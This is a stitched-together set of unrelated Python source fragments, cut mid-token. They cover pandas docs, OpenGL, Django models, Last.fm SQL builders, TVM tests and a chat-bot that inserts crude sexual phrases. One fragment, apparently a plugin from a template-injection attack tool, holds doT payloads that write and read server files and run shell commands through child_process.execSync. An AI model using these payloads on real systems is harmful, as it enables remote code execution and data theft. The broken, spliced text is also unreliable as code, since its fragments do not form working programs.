numeric values in a Series. >>> s = pd.Series([-1.10, 2, -3.33, 4]) >>> s.abs() 0 1.10 1 2.00 2 3.33 3 4.00 dtype: float64 Absolute numeric values in a Series with complex numbers. >>> s = pd.Series([1.2 + 1j]) >>> s.abs() 0 1.56205 dtype: float64 Absolute numeric values in a Series with a Timedelta element. >>> s = pd.Series([pd.Timedelta('1 days')]) >>> s.abs() 0 1 days dtype: timedelta64[ns] Select rows with data closest to certain value using argsort (from `StackOverflow <https://stackoverflow.com/a/17758115>`__). >>> df = pd.DataFrame({ ... 'a': [4, 5, 6, 7], ... 'b': [10, 20, 30, 40], ... 'c': [100, 50, -30, -50] ... }) >>> df a b c 0 4 10 100 1 5 20 50 2 6 30 -30 3 7 40 -50 >>> df.loc[(df.c - 43).abs().argsort()] a b c 1 5 20 50 0 4 10 100 2 6 30 -30 3 7 40 -50 """ # error: Incompatible return value type (got "ndarray[Any, dtype[Any]]", # expected "FrameOrSeries") return np.abs(self) # type: ignore[return-value] @final def describe( self: FrameOrSeries, percentiles=None, include=None, exclude=None, datetime_is_numeric=False, ) -> FrameOrSeries: """ Generate descriptive statistics. Descriptive statistics include those that summarize the central tendency, dispersion and shape of a dataset's distribution, excluding ``NaN`` values. Analyzes both numeric and object series, as well as ``DataFrame`` column sets of mixed data types. The output will vary depending on what is provided. Refer to the notes below for more detail. Parameters ---------- percentiles : list-like of numbers, optional The percentiles to include in the output. All should fall between 0 and 1. The default is ``[.25, .5, .75]``, which returns the 25th, 50th, and 75th percentiles. include : 'all', list-like of dtypes or None (default), optional A white list of data types to include in the result. Ignored for ``Series``. Here are the options: - 'all' : All columns of the input will be included in the output. - A list-like of dtypes : Limits the results to the provided data types. To limit the result to numeric types submit ``numpy.number``. To limit it instead to object columns submit the ``numpy.object`` data type. Strings can also be used in the style of ``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To select pandas categorical columns, use ``'category'`` - None (default) : The result will include all numeric columns. exclude : list-like
of dtypes or None (default), optional, A black list of data types to omit from the result. Ignored for ``Series``. Here are the options: - A list-like of dtypes : Exclu
des the provided data types from the result. To exclude numeric types submit ``numpy.number``. To exclude object columns submit the data type ``numpy.object``. Strings can also be used in the style of ``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To exclude pandas categorical columns, use ``'category'`` - None (default) : The result will exclude nothing. datetime_is_numeric : bool, default False Whether to treat datetime dtypes as numeric. This affects statistics calculated for the column. For DataFrame input, this also controls whether datetime columns are included by default. .. versionadded:: 1.1.0 Returns ------- Series or DataFrame Summary statistics of the Series or Dataframe provided. See Also -------- DataFrame.count: Count number of non-NA/null observations. DataFrame.max: Maximum of the values in the object. DataFrame.min: Minimum of the values in the object. DataFrame.mean: Mean of the values. DataFrame.std: Standard deviation of the observations. DataFrame.select_dtypes: Subset of a DataFrame including/excluding columns based on their dtype. Notes ----- For numeric data, the result's index will include ``count``, ``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and upper percentiles. By default the lower percentile is ``25`` and the upper percentile is ``75``. The ``50`` percentile is the same as
'''OpenGL extension ARB.robustness_application_isolation This module customises the behaviour of the OpenGL.raw.WGL.ARB.robustness_application_isolation to provide a more Python-friendly API The official definition of this extension is available here: http://www.opengl.org/registry/specs/ARB/robustness_application_isolation.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.WGL import _ty
pes, _glgets from OpenGL.raw.WGL.ARB.robustness_application_isolation import * from OpenGL.raw.WGL.ARB.robustness_application_isolation import _EXTENSION_NAME def glInitRobustnessApplicationIsolationARB(): '''Return boolean i
ndicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED SECTION
""" Database ORM models managed by this Django app Please do not integrate directly with these models!!! This app currently offers one programmatic API -- api.py for direct Python integration. """ import re from django.core.exceptions import ValidationError from django.db import models from django.utils.translation import gettext_lazy as _ from model_utils.models import TimeStampedModel from simple_
history.models import HistoricalRecords class Organization(TimeStampedModel):
""" An Organization is a representation of an entity which publishes/provides one or more courses delivered by the LMS. Organizations have a base set of metadata describing the organization, including id, name, and description. """ name = models.CharField(max_length=255, db_index=True) short_name = models.CharField( max_length=255, unique=True, verbose_name='Short Name', help_text=_( 'Unique, short string identifier for organization. ' 'Please do not use spaces or special characters. ' 'Only allowed special characters are period (.), hyphen (-) and underscore (_).' ), ) description = models.TextField(null=True, blank=True) logo = models.ImageField( upload_to='organization_logos', help_text=_('Please add only .PNG files for logo images. This logo will be used on certificates.'), null=True, blank=True, max_length=255 ) active = models.BooleanField(default=True) history = HistoricalRecords() def __str__(self): return f"{self.name} ({self.short_name})" def clean(self): if not re.match("^[a-zA-Z0-9._-]*$", self.short_name): raise ValidationError(_('Please do not use spaces or special characters in the short name ' 'field. Only allowed special characters are period (.), hyphen (-) ' 'and underscore (_).')) class OrganizationCourse(TimeStampedModel): """ An OrganizationCourse represents the link between an Organization and a Course (via course key). Because Courses are not true Open edX entities (in the Django/ORM sense) the modeling and integrity is limited to that of specifying course identifier strings in this model. """ course_id = models.CharField(max_length=255, db_index=True, verbose_name='Course ID') organization = models.ForeignKey(Organization, db_index=True, on_delete=models.CASCADE) active = models.BooleanField(default=True) history = HistoricalRecords() class Meta: """ Meta class for this Django model """ unique_together = (('course_id', 'organization'),) verbose_name = _('Link Course') verbose_name_plural = _('Link Courses')
i
mport kera
s
# Copyright 2014 Intel Corp. # # Author: Zhai Edwin <edwin.zhai@intel.com> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for ceilometer/ipmi/manager.py """ from ceilometer.ipmi import manager from ceilometer.tests import agentbase import mock from oslotest import base class TestManager(base.BaseTestCase): @mock.patch('ceilometer.pipeline.set
up_pipeline', mock.MagicMock()) def test_load_plugins(self): mgr = manager.AgentManager() self.assertIsNotNone(list(mgr.pollster_manager)) class TestRunTasks(agentbase.BaseAgentManagerTest
Case): @staticmethod def create_manager(): return manager.AgentManager() def setUp(self): self.source_resources = True super(TestRunTasks, self).setUp()
r per-faction special rules. def getFactionCost(self, unit): return sum([self.factionRules[r] for r in unit.specialRules + unit.wargearSp if r in self.factionRules]) class DumpTxt: def __init__(self): self.data = [] def _addUnit(self, unit): data = ['{0} {1} {2}+'.format(prettyName(unit), str(unit.quality), str(unit.basedefense))] data += [', '.join(PrettyEquipments(unit.equipments))] data += [", ".join(unit.specialRules)] data += [", ".join([group.name for group in unit.upgrades])] data += [points(unit.cost)] return '\n'.join([d for d in data if d]) def addUnits(self, units): self.data += [self._addUnit(unit) for unit in units] def _getUpLine(self, equ, cost): return ', '.join(PrettyEquipments(equ)) + ' ' + points(cost) def _getUpGroup(self, group, upgrades): data = '' preamble = group + ' | ' ret = [] for up in upgrades: ret += [preamble + up.text + ':'] ret += [self._getUpLine(addEqu, up.cost[i]) for i, addEqu in enumerate(up.add)] preamble = '' return data + '\n'.join(ret) def addUpgrades(self, upgrades): self.data += [self._getUpGroup(group.name, group) for group in upgrades] def addPsychics(self, psychics): if not psychics: return data = [name + '(' + str(power) + '+): ' + desc for power, spell in psy
chics.items() for name, desc in spell.items()] self.data.append('\n'.join(data)) def get(self, faction): for units, upgrades, spe
cialRules, psychics in faction.pages: self.addUnits(units) self.addUpgrades(upgrades) self.data.append('\n'.join([k + ': ' + v for k, v in specialRules.items()])) self.addPsychics(psychics) return '\n\n'.join(self.data) class DumpTex: def __init__(self): with open('Template/header.tex') as f: self.header = f.read() # Latex uses ~ to prevent line break def no_line_break(self, s): return s.replace(' ', '~') def prettyProfile(self, equipment): if isinstance(equipment, Weapon): return self.no_line_break(equipment.Profile()) return equipment.Profile() # Return a pretty string for latex of the list of equipments def PrettyEquipments(self, equipments): equWithCount = list(OrderedDict.fromkeys([(equ, equipments.count(equ)) for equ in equipments])) return [pCount(c) + self.no_line_break(e.name) + ' ' + self.prettyProfile(e) for e, c in equWithCount] def _addUnit(self, unit): cost = unit.cost equ = ", ".join(['\mbox{' + e + '}' for e in self.PrettyEquipments(unit.equipments)]) sp = ", ".join(unit.specialRules) up = ", ".join([group.name for group in unit.upgrades]) return ' & '.join([prettyName(unit), str(unit.quality), str(unit.basedefense) + '+', equ, sp, up, points(cost)]) def addUnits(self, units): self.data.append('\\UnitTable{') self.data.append('\\\\\n'.join([self._addUnit(unit) for unit in units]) + '}') def _getUpLine(self, equ, cost): return ', '.join(self.PrettyEquipments(equ)) + ' & ' + points(cost) def _getUpGroup(self, group, upgrades): self.data.append('\\UpgradeTable{') data = [] preamble = group + ' | ' for up in upgrades: data += ['\\multicolumn{2}{p{\\dimexpr \\linewidth - 2pt \\relax}}{\\bf ' + preamble + up.text + ': }'] data += [self._getUpLine(addEqu, up.cost[i]) for i, addEqu in enumerate(up.add)] preamble = '' self.data.append('\\\\\n'.join(data) + '}') def addUpgrades(self, upgrades): for group in upgrades: self._getUpGroup(group.name, group) def addSpecialRules(self, sp): if not sp: return self.data.append('\\specialrules') self.data += ['\\sprule{' + k + '}{' + v + '}' for k, v in sp.items()] def addPsychics(self, psychics): if not psychics: return self.data.append('\\startpsychic{') for quality, spells in psychics.items(): self.data += ['\\psychic{' + k + '}{' + str(quality) + '+}{' + v + '}' for k, v in spells.items()] self.data.append('}') def get(self, faction): self.data = ['\\mytitle{' + faction.title + '}'] self.data.append('\\begin{document}') for units, upgrades, specialRules, psychics in faction.pages: self.addUnits(units) self.data.append('\\begin{multicols*}{3}[]') self.addUpgrades(upgrades) self.addSpecialRules(specialRules) self.addPsychics(psychics) self.data.append('\\end{multicols*}') self.data.append('\\pagebreak') self.data.append('\\end{document}') return self.header + '\n'.join(self.data) class HtmlTag: def __init__(self, tag, content, tagparm=''): self.tag = tag self.content = content self.set_indent(0) self.leaf = isinstance(content, str) if tagparm: self.tagparm = ' ' + tagparm else: self.tagparm = '' def __str__(self): def get_str(c, indent): if isinstance(c, str): return indent + c return str(c) indent = ' ' * self.indent if isinstance(self.content, list): content = '\n'.join(get_str(c, indent) for c in self.content) else: content = self.content if self.leaf: return '{3}<{0}{1}>{2}</{0}>'.format(self.tag, self.tagparm, content, indent) return '{3}<{0}{1}>\n{2}\n{3}</{0}>'.format(self.tag, self.tagparm, content, indent) def set_indent(self, level): self.indent = level if isinstance(self.content, HtmlTag): self.content.set_indent(level + 1) if isinstance(self.content, list): for c in self.content: if isinstance(c, HtmlTag): c.set_indent(level + 1) class DumpHtml: def __init__(self): with open('Template/header.html') as f: self.header = f.read() with open('Template/footer.html') as f: self.footer = f.read() def no_line_break(self, s): return s.replace(' ', '&nbsp;') def points(self, n): return self.no_line_break(points(n)) def _addUnit(self, unit): cells = [prettyName(unit), str(unit.quality), str(unit.basedefense) + '+', ',<br> '.join(PrettyEquipments(unit.equipments)), ", ".join(unit.specialRules), ", ".join([group.name for group in unit.upgrades]), self.points(unit.cost)] return [HtmlTag('td', cell) for cell in cells] def addUnits(self, units): table_header = ['Name [size]', 'Qua', 'Def', 'Equipment', 'Special Rules', 'Upg', 'Cost'] rows = [HtmlTag('tr', [HtmlTag('th', title) for title in table_header])] rows.extend([HtmlTag('tr', self._addUnit(unit)) for unit in units]) return HtmlTag('table', rows, 'class=unit') def _getUpLine(self, equ, cost): cells = [',<br>'.join(PrettyEquipments(equ)), self.points(cost)] return [HtmlTag('td', cell) for cell in cells] def _getUpGroup(self, group, upgrades): preamble = group + ' | ' rows = [] for up in upgrades: rows.append(HtmlTag('tr', [HtmlTag('th', preamble + up.text + ':'), HtmlTag('th', '')])) rows.extend(HtmlTag('tr', self._getUpLine(addEqu, up.cost[i])) for i, addEqu in enumerate(up.add)) preamble = '' return HtmlTag('table', rows, 'class=ut1') def addUpgrades(self, upgrades): return [HtmlTag('li', self._getUpGroup(group.name, group)) for group in upgrades] def addSpecialRules(self, specialRules): if not specialRules: return [] lines = [HtmlTag('h3', 'Special Rules')] lines.extend([HtmlTag('li', [HtmlTag('b', name + ': '), desc]) for name, desc in specialRules.item
from lfmconf.lfmconf import get_lastfm_conf query_play_count_by_month = """ select * from view_play_count_by_month v where substr(v.yr_month, 1, 4) = """ query_top_with_remaining = """ with top as ( {query_top} ), total_count as ( {query_play_count} ) select t.* from top t """ query_top_artists_with_remaining = query_top_with_remaining + \ """ union all select 'Remaining artists' as artist_name, ((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count """ query_top_albums_with_remaining = query_top_with_remaining + \ """ union all select 'Remaining albums' as album_name, '...' as artist_name, ((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count """ query_top_tracks_with_remaining = query_top_with_remaining + \ """ union all select 'Remaining tracks' as track_name, '...' as artist_name, '...' as album_name, ((select tc.play_count from total_count tc) - (select sum(play_count) from top)) as play_count """ query_top_artists = """ select p.artist_name, count(p.id) as play_count from play p where p.artist_name not like 'VA %' {condition} group by p.artist_name order by count(p.id) desc """ query_top_albums = """ select p.album_name, p.artist_name, count(p.id) as play_count from play p where 1 = 1 {condition} group by p.album_name, p.artist_name order by count(p.id) desc """ query_top_tracks = """ select p.track_name, p.artist_name, p.album_name, count(p.id) as play_count from play p where 1 = 1 {condition} group by p.track_name, p.artist_name, p.album_name order by count(p.id) desc """ query_play_count = """ select count(p.id) as play_count from play p where 1 = 1 {condition} """ conf = get_lastfm_conf() dbms = conf['lastfm']['db']['dbms'] def build_query_play_count_by_month(): if dbms == 'mysql': return query_play_count_by_month + '%s' elif dbms == 'sqlite': return query_play_count_by_month + '?' def build_query_play_count_for_duration(duration): condition = build_duration_condition(duration) return query_play_count.format(condition=condition) def build_query_top_artists_for_duration_with_remaining(duration): query_top = build_query_top_artists_for_duration(duration) query_count = build_query_play_count_for_duration(duration) return query_top_artists_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_artists_for_duration(duration): condition = build_duration_condition(duration) return query_top_artists.format(condition=condition) + add_limit() def add_limit(): clause = 'limit ' if dbms == 'mysql': clause += '%s' elif dbms == 'sqlite': clause += '?' return clause def build_query_top_albums_for_duration_with_remaining(duration): query_top = build_query_top_albums_for_duration(duration) query_count = build_query_play_count_for_duration(duration) return query_top_albums_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_albums_for_duration(duration): condition = build_duration_condition(duration) return query_top_albums.format(condition=condition) + add_limit() def build_query_top_tracks_for_duration_with_remaining(duration): query_top = build_query_top_tracks_for_duration(duration) query_count = build_query_play_count_for_duration(duration) return query_top
_tracks_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_tracks_for_duration(duration): condition = build_duration_condition(duration) return query_top_tracks.format(condition=condition) + add_limit() def build_query_play_count_for_year(): condition = build_year_condition() return query_play_count.format(condition=condition) def build_query_top_artists_for_year_with_remaining():
query_top = build_query_top_artists_for_year() query_count = build_query_play_count_for_year() return query_top_artists_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_artists_for_year(): condition = build_year_condition() return query_top_artists.format(condition=condition) + add_limit() def build_query_top_albums_for_year_with_remaining(): query_top = build_query_top_albums_for_year() query_count = build_query_play_count_for_year() return query_top_albums_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_albums_for_year(): condition = build_year_condition() return query_top_albums.format(condition=condition) + add_limit() def build_query_top_tracks_for_year_with_remaining(): query_top = build_query_top_tracks_for_year() query_count = build_query_play_count_for_year() return query_top_tracks_with_remaining.format(query_top=query_top, query_play_count=query_count) def build_query_top_tracks_for_year(): condition = build_year_condition() return query_top_tracks.format(condition=condition) + add_limit() def build_duration_condition(duration): condition = '' if duration.isdigit(): if dbms == 'mysql': condition = 'and p.play_date > now() + interval - %s day' elif dbms == 'sqlite': condition =\ 'and date(p.play_date) > date(\'now\', \'-\' || ? || \' day\')' return condition def build_year_condition(): condition = '' if dbms == 'mysql': condition = 'and year(p.play_date) = %s' elif dbms == 'sqlite': condition = 'and strftime(\'%Y\', p.play_date) = ?' return condition
from utils.strings import quote from plugins.languages import javascript from utils.loggers import log from utils import rand import base64 import re class Dot(javascript.Javascript): def init(self): self.update_actions({ 'render' : { 'render': '{{=%(code)s}}', 'header': '{{=%(header)s}}', 'trailer': '{{=%(trailer)s}}' }, 'write' : { 'call' : 'inject', 'write' : """{{=global.process.mainModule.require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')}}""", 'truncate' : """{{=global.process.mainModule.require('fs').writeFileSync('%(path)s', '')}}""" }, 'read' : { 'call': 'evaluate', 'read' : """global.process.mainModule.requir
e('fs').readFileSync('%(path)s').toString('base64');""" }, 'md5' : { 'call': 'evaluate', 'md5': """global.process.mainModule.require('crypto').createHash('md5').update(global.process.mai
nModule.require('fs').readFileSync('%(path)s')).digest("hex");""" }, 'evaluate' : { 'test_os': """global.process.mainModule.require('os').platform()""", }, 'execute' : { 'call': 'evaluate', 'execute': """global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString());""" }, 'execute_blind' : { # The bogus prefix is to avoid false detection of Javascript instead of doT 'call': 'inject', 'execute_blind': """{{=''}}{{global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i');}}""" }, }) self.set_contexts([ # Text context, no closures { 'level': 0 }, { 'level': 1, 'prefix': '%(closure)s;}}', 'suffix' : '{{1;', 'closures' : javascript.ctx_closures }, ])
'''Dirty talk like you're in Dundalk''' import random import re import string __author__ = ('iandioch') COMMAND = 'flirt' PHRASES = [ "rawr~, {s}{sep}", "{s}, big boy{sep}", "{s} xo", "{s} bb{sep}", "babe, {s}{sep}", "hey xxx {s}{sep}", "{s} xxx", "{s} xx", "{s} xo", "{s} xoxo", "hot stuff, {s}{sep}", "{s} bbz{sep}", "{s} 8==)", "i'm horny. {s}{sep}", "do you want to come over tonight..? {s}{sep}", "my parents aren't home, {s}{sep}", "{s} ;)", "{s} 🍆", "{s} 🍆🍆", "{s} 🍑", "{s} 🍌", "{s} 💦💦💦", "{s} 👅", "{s} 😘😘", "{s}, cutie{sep}", "{s}, you absolute babe", "{s} later???", ] def flirt(message): if len(message) <= 1: return '' for sep in '.!?': s, sepfound, after = message.partition(sep) numspace = len(s) - len(s.lstrip()) s = ' ' * numspace + \ random.choice(PHRASES).format(s=s.lstrip().lower(), sep=sepfound) return s + flirt(after) retu
rn message def main(bot, author_id, message, thread_id, thread_type, **kwargs): message = bot.fetchThreadMessages(thread_id=thread_id, limit=2)[1] sauce = flirt(message.text) bot.sendMessage(sauce, thread_id=thread_id, thread_type=thread_type) if __name__ == '__main__': print(flirt('hey brandon do you have a minute')) print(flirt('I need to talk to you about our lor
d and saviour steely for a minute. Please brandon.')) print(flirt('Fine then')) print(flirt('Your API was shit anyway'))
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2014, 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Registry for Jasmine spec files.""" import os import re from flask_registry import RegistryProxy from werkzeug.utils import import_string from invenio_ext.registry import DictModuleAutoDiscoverySubRegistry class JasmineSpecsAutoDiscoveryRegistry(DictModuleAutoDiscoverySubRegistry): """Registry for Jasmine spec files. Looks into /testsuite/js/*.spec.js in each module. """ pattern = re.compile("(?:.+\.js$)|(?:.+\.html$)") specs_folder = 'js' def __init__(self, *args, **kwargs): """Initialize registry.""" super(JasmineSpec
sAutoDiscoveryRegistry, self).__init__( 'testsuite', **kwargs ) def keygetter(self, key, original_value, new_value): """No key mapping.""" return key def _walk_dir(self, pkg, base, root): """Recursively register *.spec.js/*.js files.""" for root, dirs, files in os.walk(root): for name in files: if Jasmin
eSpecsAutoDiscoveryRegistry.pattern.match(name): filename = os.path.join(root, name) filepath = "{0}/{1}".format( pkg, filename[len(base) + 1:] ) self.register(filename, key=filepath) def _discover_module(self, pkg): """Load list of files from resource directory.""" import_str = pkg + '.' + self.module_name try: module = import_string(import_str, silent=self.silent) if module is not None: for p in module.__path__: specsfolder = os.path.join(p, self.specs_folder) if os.path.isdir(specsfolder): self._walk_dir(pkg, specsfolder, specsfolder) except ImportError as e: # pylint: disable=C0103 self._handle_importerror(e, pkg, import_str) except SyntaxError as e: self._handle_syntaxerror(e, pkg, import_str) specs = RegistryProxy("jasmine.specs", JasmineSpecsAutoDiscoveryRegistry)
lt([i_data], i_data, mod=mod) def test_sum_loop(): mod = relay.module.Module({}) sum_up = relay.GlobalVar('sum_up') i = relay.var('i', shape=[], dtype='int32') accum = relay.var('accum', shape=[], dtype='int32') sb = ScopeBuilder() with sb.if_scope(relay.equal(i, relay.const(0, 'int32'))): sb.ret(accum) with sb.else_scope(): one_less = relay.subtract(i, relay.const(1, 'int32')) new_accum = relay.add(accum, i) sb.ret(relay.Call(sum_up, [one_less, new_accum])) func = relay.Function([i, accum], sb.get()) mod[sum_up] = func loop_bound = 0 i_data = np.array(loop_bound, dtype='int32') accum_data = np.array(0, dtype='int32') iarg = relay.var('i', shape=[], dtype='int32') aarg = relay.var('accum', shape=[], dtype='int32') mod["main"] = relay.Function([iarg, aarg], sum_up(iarg, aarg)) check_result([i_data, accum_data], sum(range(1, loop_bound + 1)), mod=mod) def test_tuple_fst(): ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))]) tup = relay.var('tup', type_annotation=ttype) f = relay.Function([tup], relay.TupleGetItem(tup, 0)) i_data = np.random.rand(41).astype('float32') j_data = np.random.rand(10).astype('float32') mod = relay.Module() mod["main"] = f check_result([(i_data, j_data)], i_data, mod=mod) def test_tuple_second(): ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))]) tup = relay.var('tup', type_annotation=ttype) f = relay.Function([tup], relay.TupleGetItem(tup, 1)) i_data = np.random.rand(41).astype('float32') j_data = np.random.rand(10).astype('float32') mod = relay.Module() mod["main"] = f check_result([(i_data, j_data)], j_data, mod=mod) def test_list_constructor(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) f = relay.Function([], one4) mod["main"] = f result = veval(mod) assert len(result) == 2 assert len(result[1]) == 2 obj = vmobj_to_list(result) tvm.testing.assert_allclose(obj, np.array([3,2,1])) def test_let_tensor(): sb = relay.ScopeBuilder() shape = (1,) x = relay.var('x', shape=shape, dtype='float32') x1 = relay.var('x1', shape=shape, dtype='float32') x1 = sb.let(x1, x) xplusone = x1 + relay.const(42.0, 'float32') sb.ret(xplusone) body = sb.get() f = relay.Function([x], body) x_data = np.random.rand(*shape).astype('float32') mod = relay.Module() mod["main"] = f check_result([x_data], x_data + 42.0, mod=mod) def test_let_scalar(): sb = relay.ScopeBuilder() x = relay.var('x', 'float32') x1 = sb.let('x1', x) xplusone = x1 + relay.const(42.0, 'float32') sb.ret(xplusone) body = sb.get() f = relay.Function([x], body) x_data = np.array(np.random.rand()).astype('float32') mod = relay.Module() mod["main"] = f check_result([x_data], x_data + 42.0, mod=mod) def test_compose(): mod = relay.Module() p = Prelude(mod) compose = p.compose # add_one = fun x -> x + 1 sb = relay.ScopeBuilder() x = relay.var('x', 'float32') x1 = sb.let('x1', x) xplusone = x1 + relay.const(1.0, 'float32') sb.ret(xplusone) body = sb.get() add_one = relay.GlobalVar("add_one") add_one_func = relay.Function([x], body) # add_two = compose(add_one, add_one) sb = relay.ScopeBuilder() y = relay.var('y', 'float32') add_two_func = sb.let('add_two', compose(add_one_func, add_one_func)) add_two_res = add_two_func(y) sb.ret(add_two_res) add_two_body = sb.get() mod[add_one] = add_one_func f = relay.Function([y], add_two_body) mod["main"] = f x_data = np.array(np.random.rand()).astype('float32') result = veval(mod, [x_data]) tvm.testing.assert_allclose(result.asnumpy(), x_data + 2.0) def test_list_hd(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l hd = p.hd one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) three = hd(one4) f = relay.Function([], three) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(result.asnumpy(), 3) @pytest.mark.xfail def test_list_tl_empty_list(): mod = relay.Module() p = Prelude(mod) nil = p.nil l = p.l tl = p.tl f = relay.Function([], tl(nil())) mod["main"] = f result = veval(mod) print(result) def test_list_tl(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l tl = p.tl one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) f = relay.Function([], tl(one4)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([2,1])) def test_list_nth(): expected = list(range(10)) for i in range(len(expected)): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons nth = p.nth l = nil() for i in reversed(expected): l = cons(relay.const(i), l) f = relay.Function([], nth(l, relay.const(i))) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(result.asnumpy(), expected[i]) def test_list_update(): expected = list(range(10)) mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons update = p.update l = nil() # create zero initialized list for i in range(len(expected)): l = cons(relay.const(0), l) # set value for i, v in enumerate(expected): l = update(l, relay.const(i), relay.const(v)) f = relay.Function([], l) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array(expected)) def test_list_length(): expected = list(range(10)) mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons length = p.length l = nil() # create zero initialized list for i in range(len(expected)): l = cons(relay.const(0), l) l = length(l) f = relay.Function([], l) mod["main"] = f result = veval(mod) tvm.
testing.assert_allclose(result.asnumpy(), 10) def test_list_map(): mod = relay.Module() p = Prelude(mod) x = relay.var('x', 'int32') add_one_func = relay.Function([x], relay.const(1) + x) nil = p.nil cons = p.cons
map = p.map l = cons(relay.const(2), cons(relay.const(1), nil())) f = relay.Function([], map(add_one_func, l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 2])) def test_list_foldl(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons foldl = p.foldl x = relay.var("x") y = relay.var("y") rev_dup_func = relay.Function([y, x], cons(x, cons(x, y))) l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], foldl(rev_dup_func, nil(), l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 3, 2, 2, 1, 1])) def test_list_foldr(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons foldr = p.foldr x = relay.var("x") y = relay.var("y") identity_func = relay.Function([x, y], cons(x, y)) l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], foldr(identity_func, nil(), l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([1, 2, 3])) def test_list_sum(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons sum = p.sum l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], sum(l)) mo
# # Contain the transformation procedure # import sys import module.loop.ast #----------------------------------------- def __makeForLoop(id, lbound, ubound, stride, loop_body): '''Generate a for loop: for (id=lbound; id<=ubound; id=id+stride) loop_body''' init_exp = None test_exp = None iter_exp = None if lbound: init_exp = module.loop.ast.BinOpExp(id.replicate(), lbound.replicate(), module.loop.ast.BinOpExp.EQ_ASGN) if ubound: test_exp = module.loop.ast.BinOpExp(id.replicate(), ubound.replicate(), module.loop.ast.BinOpExp.LE) if stride: it = module.loop.ast.BinOpExp(id.replicate(), stride.replicate(), module.loop.ast.BinOpExp.ADD) iter_exp = module.loop.ast.BinOpExp(id.replicate(), it, module.loop.ast.BinOpExp.EQ_ASGN) return module.loop.ast.ForStmt(init_exp, test_exp, iter_exp, loop_body.replicate()) #----------------------------------------- def transform(stmt, arg_info): '''Perform code transformation''' # extract argument information loop_order, = arg_info # get rid of compound statement that contains only a single statement while isinstance(stmt, module.loop.ast.CompStmt) and len(stmt.stmts) == 1: stmt = stmt.stmts[0] # insert loop order information into a hashtable loop_info = {} for index_name, is_optional in loop_order: loop_info[index_name] = [is_optional] # create loop order (get rid of all optionality information) loop_order = [iname for iname, opt in loop_order] # extract loop control information and get the loop body loop_body = None cur_stmt = stmt unseen_loops = loop_order[:] seen_loops = [] while True: if isinstance(cur_stmt, module.loop.ast.CompStmt) and len(cur_stmt.stmts) == 1: cur_stmt = cur_stmt.stmts[0] continue is_optional_list = [loop_info[i][0] for i in unseen_loops] all_unseen_optional = reduce(lambda x,y: x and y, is_optional_list, True) if isinstance(cur_stmt, module.loop.ast.ForStmt) and not cur_stmt.init: print ('error:%s:Permut: a loop is assumed to have a non-empty init exp' % (cur_stmt.line_no)) sys.exit(1) if (isinstance(cur_stmt, module.loop.ast.ForStmt) and isinstance(cur_stmt
